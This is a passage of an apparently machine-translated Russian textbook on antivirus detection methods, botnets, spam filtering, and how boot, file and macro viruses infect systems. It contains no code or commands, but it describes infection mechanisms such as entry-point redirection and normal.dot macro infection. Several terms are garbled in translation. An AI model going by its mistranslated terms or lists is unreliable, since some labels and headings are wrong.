And prevention - preventing infection (modification) of files or the operating system by malicious software.

Virus protection methods[ | ]

Three groups of methods are used to protect against viruses:

1. Methods based on file content analysis(both data files and files with commands). This group includes scanning for virus signatures, as well as integrity checking and scanning for suspicious commands.
2. Methods based on tracking program behavior when executing them. These methods consist of logging all events that threaten the security of the system and occur either during the actual execution of the test object or during its software emulation.
3. Methods regulation of work procedures with files and programs. These methods are administrative security measures.

Signature scanning method(signature analysis, signature method) is based on searching files for a unique sequence of bytes - signatures, characteristic of a particular virus. For each newly discovered virus, antivirus laboratory specialists perform an analysis, based on which its signature is determined. The resulting virus fragment is placed in a special database of virus signatures, which the antivirus program works with. The advantage of this method is the relatively low proportion of false positives, and the main disadvantage is the fundamental impossibility of detecting a new virus in the system for which there is no signature in the antivirus program database, so timely updating of the signature database is required.

Integrity control method is based on the fact that any unexpected and causeless change in data on the disk is a suspicious event that requires special attention of the anti-virus system. The virus necessarily leaves evidence of its presence (changes in the data of existing (especially system or executable) files, the appearance of new executable files, etc.). Fact of data change - integrity violation- is easily established by comparing the checksum (digest), calculated in advance for the initial state of the test object, and the checksum (digest) of the current state of the test case. If they do not match, it means that the integrity has been violated and there is every reason to carry out an additional check for this, for example, by scanning virus signatures. This method works faster than the signature scanning method, since calculating checksums requires less calculations than the operation of byte-by-byte comparison of virus fragments, in addition, it allows you to detect traces of the activity of any, including unknown, viruses for which there are no signatures in the database yet.

Method for scanning suspicious commands(heuristic scanning, heuristic method) is based on identifying in the scanned file a certain number of suspicious commands and (or) signs of suspicious sequences (for example, a command to format a hard disk or an injection function into a running or executable process). After this, an assumption is made about the malicious nature of the file and additional steps are taken to check it. This method is fast, but quite often it is not able to detect new viruses.

Method for tracking program behavior is fundamentally different from the file content scanning methods mentioned earlier. This method is based on analyzing the behavior of running programs, comparable to catching a criminal “by the hand” at the crime scene. Antivirus tools of this type often require the active participation of the user, called upon to make decisions in response to numerous system warnings, many of which may later turn out to be false alarms. The frequency of false positives (suspecting a virus for a harmless file or missing a malicious file) above a certain threshold makes this method ineffective, and the user may stop responding to warnings or choose an optimistic strategy (allow all actions to all running programs or disable this antivirus feature). When using anti-virus systems that analyze the behavior of programs, there is always a risk of executing virus commands that can cause damage to the protected computer or network. To eliminate this drawback, an emulation (simulation) method was later developed, which allows you to run the program under test in an artificially created (virtual) environment, which is often called a sandbox, without the risk of damaging the information environment. The use of methods for analyzing program behavior has shown their high efficiency in detecting both known and unknown malware.

False antiviruses [ | ]

In 2009, the active spread of false antiviruses began [ ] - software that is not anti-virus (that is, does not have real functionality to counteract malware), but pretends to be so. In fact, false antiviruses can be either programs to deceive users and make a profit in the form of payments for “curing the system of viruses,” or ordinary malicious software.

Special antiviruses[ | ]

In November 2014, the international human rights organization Amnesty International released Detect, an anti-virus program designed to detect malware distributed by government agencies to spy on civil activists and political opponents. The antivirus, according to the creators, performs a deeper scan of the hard drive than conventional antiviruses.

Antivirus effectiveness[ | ]

The analytical company Imperva, as part of the Hacker Intelligence Initiative, published an interesting study that shows the low effectiveness of most antiviruses in real conditions.

According to the results of various synthetic tests, antiviruses show an average efficiency of around 97%, but these tests are carried out on databases of hundreds of thousands of samples, the vast majority of which (maybe about 97%) are no longer used to carry out attacks.

The question is how effective antiviruses are against the most current threats. To answer this question, Imperva and students from Tel Aviv University obtained 82 samples of the latest malware from Russian underground forums and tested them against VirusTotal, that is, against 42 antivirus engines. The result was disastrous.

1. The effectiveness of antiviruses against newly compiled malware was less than 5%. This is a completely logical result, since virus creators always test them against the VirusTotal database.
2. It takes up to four weeks from the appearance of the virus until it begins to be recognized by antiviruses. This figure is achieved by “elite” antiviruses, while for other antiviruses the period can reach up to 9-12 months. For example, at the beginning of the study on February 9, 2012, a fresh sample of the fake Google Chrome installer was tested. After the end of the study on November 17, 2012, only 23 out of 42 antiviruses detected it.
3. Antiviruses with the highest percentage of malware detection also have a high percentage of false positives.
4. Although the study can hardly be called objective, because the sample of malware was too small, it can be assumed that antiviruses are completely unsuitable against new cyber threats.

Classifications of antivirus programs[ | ]

Anti-virus programs are divided by execution (blocking means) into:

• software;
• software and hardware.

Based on placement in RAM, the following are distinguished:

• resident (they begin their work when the operating system starts, are constantly in the computer’s memory and automatically scan files);
• non-resident (launched at the user’s request or in accordance with the schedule specified for them).

Based on the type (method) of protection against viruses, there are:

In accordance with the regulatory legal act of the FSTEC of Russia “Requirements in the field of technical regulation for products used to protect information constituting a state secret or classified as other restricted access information protected in accordance with the legislation of the Russian Federation (requirements for anti-virus protection means)” (approved . by order of the FSTEC of Russia dated March 20, 2012 No. 28) the following types of anti-virus protection are distinguished:

• type “A” - anti-virus protection tools (components of anti-virus protection tools), intended for centralized administration of anti-virus protection tools installed on information system components (servers, automated workstations);
• type “B” - anti-virus protection tools (components of anti-virus protection tools) intended for use on information system servers;
• type “B” - anti-virus protection tools (components of anti-virus protection tools) intended for use at automated workstations of information systems;
• type “G” - anti-virus protection tools (components of anti-virus protection tools) intended for use in autonomous automated workstations.

Anti-virus protection tools of type “A” are not used in information systems independently and are intended for use only in conjunction with anti-virus protection tools of types “B” and (or) “C”.

The word "bot" is short for the word "robot". A bot is a piece of code that performs some functionality for its owner, who is the author of this code. Bots (bot) are a type of malware that are installed on thousands of computers. The computer on which the bot is installed is called zombie(zombie). The bot receives commands from its owner and forces the infected computer to execute them. Such commands can be sending spam, viruses or carrying out attacks. The attacker prefers to perform such actions using bots rather than his own computer, since this allows him to avoid detection and identification.

A set of zombie computers compromised by an attacker on which bots are installed is called botnet (botnet). To create a botnet, hackers compromise thousands of systems by sending malicious code in a variety of different ways: as attachments to email messages, through compromised websites, by sending links to malicious sites as attachments to email messages, etc. If successfully installed on the user's computer, the malicious code sends a message to the attacker that the system has been hacked and is now available to the attacker, who can use it at will. For example, he can use the created botnet to carry out powerful attacks or rent it out to spammers. Moreover, most of the computers included in the botnet are home computers of unsuspecting users.

The owner of this botnet controls the systems included in it remotely, usually through the IRC (Internet Relay Chat) protocol.

The basic steps for creating and using botnets are given below:

1. The hacker uses various methods to send potential victims malicious code that contains bot software.
2. After successful installation on the victim's system, the bot establishes contact with the botnet's control server, communicating with it via IRC or a special web server, in accordance with what is specified in its code. After this, the control server takes over control of the new bot.
3. The spammer pays the hacker for using the systems of his botnet, the hacker sends the appropriate commands to the control server, and the control server, in turn, instructs all infected systems included in the botnet to send spam.

Spammers use this method because it significantly increases the likelihood of their messages reaching recipients, bypassing their installed spam filters, because. such messages will be sent not from one address, which will quickly be blocked or added to all “black lists,” but from many real addresses of the owners of hacked computers.

To create a botnet, its future owner either does everything himself or pays hackers to develop and distribute malware to infect systems that will become part of his botnet. And then the owner of the botnet will be contacted and paid by those who want to tell you about their new products, as well as those who need to attack competitors, steal personal data or user passwords, and many others.

Traditional antivirus software uses signatures to detect malicious code. Signatures are fingerprints of malicious code created by the antivirus software manufacturer. The signature is code fragments extracted from the virus itself. An antivirus program scans files, emails, and other data that passes through certain systems and compares them to its database of virus signatures. When a match is detected, the antivirus program performs a pre-configured action, which may be sending the infected file to quarantine, attempting to “cure” the file (remove the virus), displaying a warning window for the user, and/or recording an event in .

Signature-based detection of malicious code is an effective way to detect malware, but there are certain delays in responding to new threats. After a virus is first discovered, the antivirus manufacturer must study the virus, develop and test new signatures, release an update to the signature database, and all users must download the update. If the malicious code is simply sending your photos to all your friends, this delay is not so critical. However, if the malware is similar to the Slammer worm, the damage from such a delay could be catastrophic.

NOTE. The Slammer worm appeared in 2003. He exploited a vulnerability in the Microsoft SQL Server 2000 DBMS that allowed him to cause a denial of service. By some estimates, Slammer caused more than $1 billion in damage.

With new malware being created daily, it is difficult for antivirus software manufacturers to keep up. Virus signature technology allows you to detect viruses that have already been identified and for which a signature has been created. But because virus writers are so prolific and many viruses can change their code, it is important that antivirus software have other mechanisms to detect malicious code.

Another method that almost all antivirus software products use is to detect malicious code based on heuristic analysis (heuristic detection). This method analyzes the overall structure of the malicious code, evaluates the instructions and algorithms executed by the code, and studies the types of data used by the malicious program. Thus, it collects a large amount of information about a piece of code and evaluates the likelihood that it is malicious in nature. It uses a kind of “suspiciousness counter”, which increases as the antivirus program finds new potentially dangerous (suspicious) properties in it. When a predetermined threshold is reached, the code is considered dangerous and the antivirus program initiates appropriate defense mechanisms. This allows antivirus software to recognize unknown malware instead of just relying on signatures.

Consider the following analogy. Ivan is a policeman, he works to catch the bad guys and lock them up. If Ivan is going to use the signature method, he compares stacks of photographs of every person he sees on the street. When he sees a match, he quickly catches the bad guy and puts him in his patrol car. If he is going to use a heuristic method, he watches for suspicious activities. For example, if he sees a man in a ski mask standing in front of a bank, he assesses the likelihood that he is a robber and not just a cold guy asking for change from bank customers.

NOTE. Diskless workstations are also vulnerable to viruses, despite the lack of a hard drive and a full-fledged operating system. They may be infected with viruses that download and live in memory. Such systems can be rebooted remotely (remote reboot) to clear memory and return it to its original state, i.e. the virus lives briefly in such a system.

Some antivirus products create an artificial environment called a virtual machine or sandbox and allow some of the suspicious code to run in a protected environment. This gives the antivirus program the ability to see the code in action, which gives much more information to decide whether it is malicious or not.

NOTE. A virtual machine or sandbox is sometimes called emulation buffer(emulation buffer). This is the same as a protected memory segment, so even if the code does turn out to be malicious, the system will still remain safe.

Analyzing information about a piece of code is called static analysis , if you run a piece of code on a virtual machine, this is called dynamic analysis . Both of these methods are considered heuristic detection methods.

Vaccination. Another approach that some antivirus programs have used is called vaccination(immunization). Products with this functionality made changes to files and disk areas to make them appear as if they were already infected. In this case, the virus may decide that the file (disk) is already infected and will not make any additional changes, moving on to the next file.

A vaccination program, as a rule, is aimed at a specific virus, since each of them checks the fact of infection differently and looks for different data (signatures) in the file (on disk). However, the number of viruses and other malicious software is constantly growing, and so is the number of files that need to be protected, so this approach is currently not practical in most cases, and antivirus manufacturers no longer use it.

Currently, even with all these sophisticated and effective approaches, there is no absolute guarantee of the effectiveness of antivirus tools, since virus writers are very cunning. It's a constant game of cat and mouse that goes on every day. The antivirus industry is finding a new way to detect malware, and next week virus writers are finding a way around this new method. This forces antivirus manufacturers to constantly increase the intelligence of their products, and users have to buy new versions of them every year.

The next stage in the evolution of antivirus software is called behavioral blockers (behavior blocker). Antivirus software that performs behavioral blocking essentially allows suspicious code to run on an unprotected operating system and monitors its interaction with the operating system, paying attention to suspicious activity. Specifically, antivirus software monitors for the following types of activity:

• Writing to files that are automatically loaded at system startup or to startup sections in the system registry
• Opening, deleting or changing files
• Including scripts in emails to send executable code
• Connecting to network resources or shared folders
• Changing the logic of executable code
• Creating or modifying macros and scripts
• Formatting the hard drive or writing to the boot sector

If an antivirus program detects some of these potentially dangerous activities, it can force the program to terminate and notify the user. The new generation of behavioral blockers actually analyzes the sequence of such actions before deciding that the system is infected (the first generation of behavioral blockers simply triggered individual actions, which led to a large number of false positives). Modern antivirus software can intercept the execution of dangerous pieces of code and prevent them from interacting with other running processes. They can also detect . Some of these antivirus programs allow you to “roll back” the system to the state it was in before the infection, “erasing” all changes made by the malicious code.

It would seem that behavioral blockers can completely solve all the problems associated with malicious code, but they have one drawback, which requires such monitoring of malicious code in real time, otherwise the system may still be infected. In addition, constant monitoring requires a large amount of system resources...

NOTE. Heuristic analysis and behavior-based blocking are considered proactive techniques and can detect new malware, sometimes called zero-day attacks. Signature-based malware detection cannot identify new malware.

Most antivirus programs use a combination of all of these technologies to provide the best protection possible. Selected anti-malware solutions are shown in Figure 9-20.

Figure 9-20. Antivirus software makers use different methods to detect malicious code

We're all very tired of emails asking us to buy something we don't need. Such letters are called spam (spam) are unwanted email messages. Spam not only distracts its recipients from their business, but consumes significant network bandwidth and can also be a source of malware. Many companies use spam filters on their email servers, and users can configure spam filtering rules in their email clients. But spammers, as well as virus writers, are constantly coming up with new and ingenious ways to bypass spam filters.

Effective spam detection has become a real science. One of the methods used is called Bayesian filtering (Bayesian filtering). Many years ago, a gentleman named Thomas Bayes (mathematician) developed an effective way to predict the probability of the occurrence of any events using mathematics. Bayes' theorem allows us to determine the probability that an event occurred in the presence of only indirect evidence (data), which may be inaccurate. Conceptually, this is not that difficult to understand. If you hit your head against a brick wall three times and fell each time, you might conclude that trying again will produce the same painful results. It's more interesting when this logic is applied to actions that contain many more variables. For example, how does a spam filter work that does not allow letters from you with an offer to buy Viagra, but does not prevent the delivery of mail from your friend who is very interested in this drug and writes you messages about its properties and effects on the body? The Bayes filter applies statistical modeling to the words that make up email messages. Mathematical formulas are performed on these words to fully understand their relationship to each other. The Bayes filter performs frequency analysis on each word and then evaluates the message as a whole to determine whether it is spam or not.

This filter doesn't just look for the words "Viagra," "sex," etc., it looks at how often those words are used and in what order to determine whether a message is spam. Unfortunately, spammers know how these filters work and manipulate words in the subject line and body of the message to try to fool the spam filter. This is why you may receive spam messages with misspellings or words that use symbols instead of letters. Spammers are very interested in you receiving their messages because they make a lot of money from it.

Protecting companies from a wide variety of malware requires more than just antivirus software. As with other components, certain additional administrative, physical, and technical safeguards are required to be implemented and maintained.

The company must have a separate anti-virus policy, or anti-virus protection issues must be taken into account in the general one. Must be developed that define the types of anti-virus and anti-spyware software required for use in the company, as well as the main parameters of their configuration.

Information about virus attacks, anti-virus protection tools used, as well as the behavior expected from users should be provided in the program. Every user should know what they should do and where to go if a virus is detected on their computer. The standard must address all issues related to user actions associated with malicious code, and must indicate what the user must do and what he is prohibited from doing. In particular, the standard should contain the following questions:

• Anti-virus software must be installed on every workstation, server, communicator, and smartphone.
• Each of these devices must have a way to automatically update antivirus signatures, which must be enabled and configured on each device.
• The user should not be able to disable antivirus software.
• The virus removal process must be developed and planned in advance, and a contact person must be identified and appointed in case malicious code is detected.
• All external drives (USB drives, etc.) should be scanned automatically.
• Backup files must be scanned.
• Antivirus policies and procedures should be reviewed annually.
• The antivirus software you use must provide protection against boot viruses.
• Antivirus scanning must be performed independently on the gateway and on each individual device.
• Anti-virus scanning should run automatically on a schedule. You don't have to rely on users to run scans manually.
• Critical systems must be physically protected in such a way that local installation of malicious software on them is impossible.

Because malware can cause millions of dollars in damage (in operational costs, lost productivity), many companies install antivirus solutions at all network entry points. An anti-virus scanner can be integrated into the mail server software, or . This anti-virus scanner checks all incoming traffic for the presence of malicious code in order to detect and stop it in advance, even before it reaches the internal network. Products that implement this functionality can scan traffic from SMTP, HTTP, FTP, and possibly other protocols. But it is important to understand that such a product monitors only one or two protocols, and not all incoming traffic. This is one of the reasons why every server and workstation should also have antivirus software installed.

In Article 273 of the Criminal Code of the Russian Federation, under malware refers to computer programs or changes to existing programs that “knowingly lead to unauthorized destruction, blocking, modification or copying of information, disruption of the operation of a computer, computer system or their network.”

Microsoft Corporation uses the term malware, defining it as follows: “malware is an abbreviation for malicious software, usually used as a common term to refer to any software specifically designed to cause damage to an individual computer, server, or computer network, regardless of whether whether it is a virus, spyware, etc.”

The harm caused by such software may include damage to:

• software and hardware of the computer (network) attacked by the intruder;
• computer user data;
• to the computer user himself (indirectly);
• users of other computers (indirectly).

Specific damage to users and (or) owners of computer systems and networks may include the following:

• leakage and (or) loss of valuable information (including financial information);
• abnormal behavior of software installed in the system;
• a sharp increase in incoming and (or) outgoing traffic;
• slowdown or complete failure of the computer network;
• loss of working time of the organization's employees;
• the offender’s access to the resources of the corporate computer network;
• risk of becoming a victim of fraud.

Signs of malware include the following:

• hiding your presence in a computer system;
• implementation of self-duplication, association of your code with other programs, transfer of your code to previously unoccupied areas of computer memory;
• distortion of the code of other programs in the computer's RAM;
• saving data from the RAM of other processes in other areas of the computer's memory;
• distortion, blocking, substitution of stored or transmitted data obtained as a result of the operation of other programs or already located in the external memory of the computer;
• incorrectly informing the user about the actions allegedly performed by the program.

A malicious program can have only one of the characteristics listed above or a combination of them. Obviously, the above list is not exhaustive.

Based on the presence of material benefits, malicious software (software) can be divided into:

• not bringing direct material benefit to the person who developed (installed) the malicious program (developed based on hooliganism, “joke”, vandalism, including on religious, nationalist, political grounds, self-affirmation and the desire to confirm one’s qualifications);
• bringing direct material benefit to the offender in the form of theft of confidential information, including gaining access to bank-client systems, obtaining PIN codes of credit cards and other personal data of the user, as well as gaining control over remote computer systems for the purpose of distributing spam from numerous “infected” computers (zombie computers).

Based on the purpose of development, malware can be divided into:

• Software that was originally developed specifically to gain unauthorized access to information stored on a computer with the aim of causing damage to the owner of the information and (or) the owner of the computer (computer network);
• Software that was not initially developed specifically to gain unauthorized access to information stored on a computer, and was not initially intended to cause damage to the owner of the information and (or) the owner of the computer (computer network).

Recently, there has been a criminalization of the malware creation industry, resulting in the following:

• theft of confidential information (trade secrets, personal data);
• creating zombie networks (“botnets”) designed to send spam, distributed denial of service attacks (DDoS attacks), and introducing Trojan proxy servers;
• encryption of user information with subsequent blackmail and ransom demands;
• attacks on antivirus products;
• so-called flushing (permanent denial of service - PDoS).

Denial of service attacks are now used not so much as a tool to extort money from victims, but as a means of political and competitive warfare. If previously DoS attacks were a tool in the hands of extortion hackers or hooligans only, now they have become the same commodity as spam mailings or custom-made malware. Advertising of DoS attack services has become commonplace, and prices are already comparable to the cost of organizing spam mailings.

Companies specializing in computer and network security are paying attention to a new type of threat - the so-called permanent denial of service (ROoS). The new type of attack received another name - flushing. It is potentially capable of causing much more harm to the system than any other type of network malicious activity, since it is aimed at disabling computer equipment. RooB attacks are more effective and cheaper than traditional types of attacks, in which the hacker tries to install malware on the victim's system. When flashing, the target of the attack is programs in the VUB flash memory and device drivers, which, when damaged, disrupt the operation of the devices and are potentially capable of physically destroying them.

Another type of attack aimed at stealing confidential information is when attackers introduce a malicious program into a company’s information system that can block the operation of the system. At the next stage, the attacked company receives a letter from criminals demanding money for a password that will allow them to unlock the company’s computer system. Another similar way to make money illegally online is to launch Trojan programs into your computer that can encrypt data. The decryption key is also sent by criminals for a certain monetary reward.

The personal data of the user of the attacked computer that is of interest to the attacker includes:

• documents and other user data stored in computer memory;
• account names and passwords for access to various network resources (electronic money and payment systems, Internet auctions, Internet pagers, e-mail, Internet sites and forums, online games);
• email addresses of other users, 1P addresses of other computers on the network.

Thanks to the new opportunities provided by the Internet and especially the widespread spread of social networks, an increasing number of people regularly turn to Internet resources and become victims of increasingly sophisticated attacks, the purpose of which is to both steal confidential user data and “zombie” their computers with for the purpose of subsequent use of their resources by violators.

The effective operation of a “zombie” network is determined by three components of which it conventionally consists:

• a loader program whose task is to distribute its own code and the code of the bot program that performs the main work;
• a bot program that collects and transmits confidential information, sends spam, participates in an EEoB attack and other actions assigned to it by the violator;
• a botnet control module that collects information from bot programs and sends them updates and, if necessary, new configuration files that “retarget” the bot programs.

Examples of antivirus software installed on the user to counteract malware are:

• forced stop of the anti-virus scanner or monitor;
• changing the security system settings to facilitate the implementation and operation of the malicious program;
• automatic clicking on the “Skip” button after the user receives a warning about detected malware;
• hiding your presence in the system (so-called “rootkits”);
• complicating anti-virus analysis through additional transformation of malicious code (encryption, obfuscation or obfuscation, polymorphism, packaging).

Until recent years, the work of anti-virus programs was based solely on analysis of the contents of the scanned object. At the same time, the earlier signature-based method of detecting viruses (the so-called scanning) used a search for fixed sequences of bytes, often at a certain offset from the beginning of the object, contained in the binary code of the malicious program. Heuristic analysis, which appeared a little later, also checked the contents of the object being scanned, but was based on a freer, probabilistic search for byte sequences characteristic of a potentially malicious program. Obviously, a malicious program will easily bypass such protection if each copy of it is a new set of bytes.

This is precisely the problem that polymorphism and metamorphism solve, the essence of which is that when creating its next copy, the malicious program completely changes at the level of the set of bytes that it consists of. However, its functionality remains unchanged.

Encryption and obfuscation (code obfuscation) themselves are primarily aimed at making it difficult to analyze program code, but, implemented in a certain way, they turn out to be types of polymorphism (for example, encrypting each copy of a virus with a unique key). Obfuscation itself only complicates analysis, but, used in a new way in each copy of the malware, it interferes with anti-virus scanning.

Polymorphism became relatively widespread only in the era of viruses that infect files. This is explained by the fact that writing polymorphic code is a very complex and resource-intensive task and is justified only in cases where the malicious program independently reproduces: each new copy of it is a more or less unique set of bytes. For most modern malware that does not have a self-replication function, this is not relevant. Therefore, polymorphism is not very common in malware at present.

On the contrary, obfuscation, as well as other methods of modifying code, which largely solve the problem of complicating its heuristic analysis, and not the task of complicating scanning, due to this circumstance does not lose its relevance.

To reduce the size of a file with a malicious program, so-called packers are used - special programs that process the file according to the principle of an archiver. A side and beneficial (from the point of view of counteracting antivirus programs) effect of using packers is that antivirus scanning is somewhat difficult.

This is explained by the fact that when developing a new modification of a malicious program, its author usually changes several lines of code, leaving its core intact. In the executable code, the bytes in a certain section of the file change, and if the signature used by the antivirus program did not consist of this particular section, then the malicious program will still be detected. Processing the program with a packer solves this problem, since changing even one byte in the source executable code results in a completely new set of bytes in the packed file.

Many modern packers, in addition to compressing the source file, provide it with additional self-defense functions aimed at making it difficult to unpack the file and analyze it using a debugger.

Malware (sometimes also called destructive software influences) It is customary to include computer viruses and software bookmarks. First time term computer virus introduced by US specialist F. Cohen in 1984. A “classical” computer virus is an autonomously functioning program that simultaneously has three properties:

• the ability to include your code in the bodies of other objects (files and system areas of computer memory);
• subsequent independent implementation;
• independent distribution in computer systems.

Computer viruses do not use network services to penetrate other computers on the network. A copy of the virus reaches remote computers only if the infected object, for some reason beyond the control of the virus, is activated on another computer, for example:

• when infecting user-accessible network drives, the virus penetrated into files located on these network resources;
• the virus has copied itself to removable media or infected files on it;
• The user sent an email with a virus-infected attachment.

An important fact is that viruses do not have the means to spread beyond the boundaries of one computer. This can only happen when a removable storage medium (floppy disk, flash drive) is infected or when the user himself transfers a virus-infected file to another computer over the network.

Boot viruses infect the master boot sector of a hard disk (Master Boot record - MBR) or the boot sector of a hard disk partition, system floppy disk or boot CD (Boot Record - BR), replacing the boot and operating system boot programs contained in them with their code. The original contents of these sectors are stored in one of the free sectors of the disk or directly in the body of the virus.

After infecting the MBR, which is the first sector of the zero head of the zero cylinder of the hard disk, the virus gains control immediately after the completion of the hardware test procedure (POST), the BIOS Setup program (if it was called by the user), BIOS procedures and its extensions. Having gained control, the boot virus performs the following actions:

• 1) copying your code to the end of the computer’s RAM, thereby reducing the size of its free part;
• 2) overriding several BIOS interrupts, mainly related to accessing disks;
• 3) loading a true boot program into the computer's RAM memory, the functions of which include viewing the hard drive partition table, determining the active partition, loading and transferring control to the operating system boot program of the active partition;
• 4) transfer of control to the true bootstrap program.

A boot virus in VY works in a similar way, replacing the operating system boot program. A common form of infection of a computer with a boot virus is an accidental attempt to boot from a non-system floppy disk (or CO disk), the boot sector of which is infected with a virus. This situation occurs when an infected floppy disk remains in the drive when the operating system is rebooted. Once the master boot sector of a hard drive is infected, the virus spreads the first time any uninfected floppy disk is accessed.

Boot viruses usually belong to the group of resident viruses. Boot viruses were quite common in the 90s of the last century, but practically disappeared with the transition to 32-bit operating systems and the abandonment of the use of floppy disks as the main method of exchanging information. Theoretically, it is possible that boot viruses could appear that infect SP disks and flash disks, but so far no such viruses have been detected.

File viruses infect files of various types:

• program files, device driver files and other operating system modules;
• document files that may contain macros;
• document files that may contain scripts (scripts) or separate script files, etc.

When a file is infected, the virus writes its code to the beginning, middle, or end of the file, or to several places at once. The source file is modified so that once the file is opened, control is immediately transferred to the virus code. After receiving control, the virus code performs the following sequence of actions:

• 1) infection of other files (combined viruses) and system areas of disk memory;
• 2) installation of own resident modules (resident viruses) in RAM;
• 3) performing other actions depending on the algorithm implemented by the virus;
• 4) continuation of the usual procedure for opening a file (for example, transferring control to the source code of the infected program).

Viruses in program files, when infected, change their header in such a way that after loading the program into RAM, control is transferred to the virus code. For example, the portable executable file format of the Windows and OS/2 operating systems (Portable Executable - PE) has the following structure:

• 1) header in MS-DOS operating system format;
• 2) code of the real processor mode program, which takes control when trying to launch a Windows application in the MS-DOS operating system environment;
• 3) PE file header;
• 4) additional (optional) PE file header;
• 5) headers and bodies of all application segments (program code, its static data, data exported by the program, data imported by the program, debugging information, etc.).

The section containing the optional PE file header includes a field containing the address of the application's entry point. Immediately before the entry point in the application code segment is an Import Address Table (IAT), which is populated with valid addresses when the executable code is loaded into the process's address space.

When a virus infects a program file, the application's entry point address is changed to point to the beginning of the virus code and ensure that it automatically takes control when the program file is loaded. It is also possible to modify operating system kernel modules (for example, kernel32.dll) to intercept calls to some system functions (for example, CreateProcess, CreateFile, ReadFile, WriteFile, CloseHandle) to infect other files.

A type of file viruses are viruses in clusters of an infected logical disk or floppy disk. When infected, the virus code is copied to one of the free disk clusters, which is marked in the File Allocation Table (FAT) as the last file cluster. Then the descriptions of the program files in the directory are changed - instead of the number of the first cluster allocated to the file, the number of the cluster containing the virus code is placed. In this case, the true number of the first cluster of the infected file is encrypted and stored, for example, in an unused part of the file description in the directory.

When an infected file is launched, control is obtained by the virus code, which:

• 1) installs its resident module in RAM, which will subsequently intercept all access to the infected disk;
• 2) loads the source program file and transfers control to it.

When subsequently accessing the directory with infected files, the resident part of the virus transmits to the operating system the true values ​​of the numbers of the first clusters allocated to the infected files.

Viruses in document files created, for example, by Microsoft Office programs are distributed using macros included in them (procedures in the Visual Basic for Applications - VBA programming language). Therefore, such viruses are sometimes called macro viruses or simply macroviruses.

Macro programming languages, especially VBA, are universal languages ​​that support object-oriented programming technology, have a large library of standard macro commands and allow you to create quite complex procedures. In addition, it supports automatically running macros associated with certain events (for example, opening a document) or certain user actions (for example, when calling a command to save a document to a file).

Examples of automatically running macros associated with specific Microsoft Word document processing events include:

• AutoExec (automatically executed when the Microsoft Word word processor starts, if located in the normal.dot template file or in a file in the Startup subfolder of the Microsoft Office folder);
• AutoNew (automatically takes control when creating a new document);
• AutoOpen (automatically executed when opening a document);
• AutoClose (automatically executed when closing a document);
• Auto Exit (automatically takes control when the Microsoft Word word processor ends).

The Microsoft Excel spreadsheet processor supports only some of the automatically executed macros, and the names of these macros are slightly changed - Auto_open and Auto_close.

The Microsoft Word word processor also defines macros that automatically receive control when the user calls one of the standard commands - File Save (File | Save), FileSaveAs (File | Save As), Tools-Macro (Tools | Macro | Macros), ToolsCustomize ( Service | Settings), etc.

A Microsoft Office document may also contain macros that automatically receive control when the user presses a certain combination of keys on the keyboard or reaches a certain point in time (date, time of day).

Any macro (including automatically executed ones) from a separate document can be written to the normal.dot template file (and vice versa) and thereby become available when editing any Microsoft Word document. Writing a macro to the normal.dot file can be done using the standard MacroCopy macro command (WordBasic), the OrganizerCopy method of the Application object, or the Copy methods of the standard Organizer (Microsoft Word) and Sheets (Microsoft Excel) objects.

To manipulate files located in the external memory of the computer, macros can use standard macro commands Open (opening an existing or creating a new file), SetAttr (changing file attributes), Name (renaming a file or folder), Get (reading data from an open file), Put (write data to an open file), Seek (change the current position of writing or reading from a file), Close (close a file), Kill (delete a file), RmDir (delete a folder), MkDir (create a new folder), ChDir (change the current folders) etc.

A standard Shell macro command allows you to execute any program or system command installed on your computer.

Thus, the VBA programming language may well be used by authors of macro viruses to create very dangerous code. The simplest macro virus in a Microsoft Word document infects other document files as follows:

• 1) when an infected document is opened, control is given to the macro containing the virus code;
• 2) the virus places other macros with its own code in the normal.dot template file (for example, FileOpen, FileSaveAs and FileSave);
• 3) the virus sets the corresponding flag in the Windows registry and (or) in the Microsoft Word initialization file indicating that the infection has occurred;
• 4) when Microsoft Word is subsequently launched, the first file opened is actually the already infected template file normal.dot, which allows the virus code to automatically take control, and infection of other document files can occur when they are saved using standard Microsoft Word commands.

We can say that most macro viruses belong to the group of resident viruses, since part of their code is constantly present in the computer’s RAM while the program from the Microsoft Office package is running.

The placement of the macro virus code inside a Microsoft Office document can be indicated quite schematically, since the document file format is very complex and contains a sequence of data blocks of various formats, combined with each other using a large amount of service data. A special feature of macro viruses is that they can infect document files on computers of various platforms, not just IBM PC. Infection will be possible if office programs that are fully compatible with programs from the Microsoft Office suite are installed on the computer.

When saving document files, they also include random data that is not related to the content of the document, but contained in blocks of RAM that are allocated but not completely filled when editing the document. Therefore, when adding new data to a document, its size may change in an unpredictable way, including decreasing. This does not allow us to judge whether a document file is infected with macro viruses, since its size after infection will also change unpredictably. We also note that information accidentally saved along with a public document file may contain confidential information.

Most known macro viruses place their code only in macros. However, there are also types of viruses in document file macros in which the virus code is stored not only in macros. These viruses include a small macro loader of the main virus code, which calls the macro editor built into Microsoft Office, creates a new macro with the virus code, executes it, and then deletes the created macro to hide traces of its presence. In this case, the main virus code is present as an array of strings either in the body of the loader macro or in the variable area of ​​the infected document.

Infecting the normal.dot template file is not the only way macro viruses can spread on a user's computer. It is also possible that additional template files located in the Startup folder inside the Microsoft Office folder can be infected. Another way to infect user document files with macro viruses is to inject them into Microsoft Word add-on files located in the Addins folder of the Microsoft Office folder. Macro viruses that do not place their code in the common normal.dot template can be classified as non-resident viruses. To infect other files, these macro viruses either use standard macro commands for working with VBA language files and folders, or use the list of recently edited files by the user, which is contained in the “File” submenu of Microsoft Word and other Microsoft Office programs.

The Microsoft Excel spreadsheet does not use the normal.dot template file, so files from the Startup folder are used to infect other user document files. A special feature of macro viruses that infect Excel spreadsheet files is that they can be written using not only the VBA programming language, but also the macro language of “old” versions of Microsoft Excel, which is also supported in later versions of this spreadsheet processor.

In the Microsoft Access database management system, macros written in a special scripting language that has very limited capabilities are used to automatically obtain control when some event occurs (for example, opening a database). But these automatically executed script macros (for example, the AutoExec macro that automatically takes control when you start Microsoft Access) can call full macros written in VBA. Therefore, in order to infect a Microsoft Access database, a virus must create or replace an automatically executed macro script and copy a module with macros containing the main part of the virus code into the infected database.

Combined viruses are known that can infect both Microsoft Access databases and Microsoft Word documents. Such a virus consists of two main parts, each of which infects document files of its own type (.doc or .mdb). But both parts of such a virus are capable of transferring their code from one Microsoft Office application to another. When transferring virus code from Microsoft Access, an infected additional template file (.dot file) is created in the Startup folder, and when transferring virus code from Microsoft Word, an infected Access database file is created, which is passed as a parameter to the Microsoft Access application launched by the virus code (msaccess .exe).

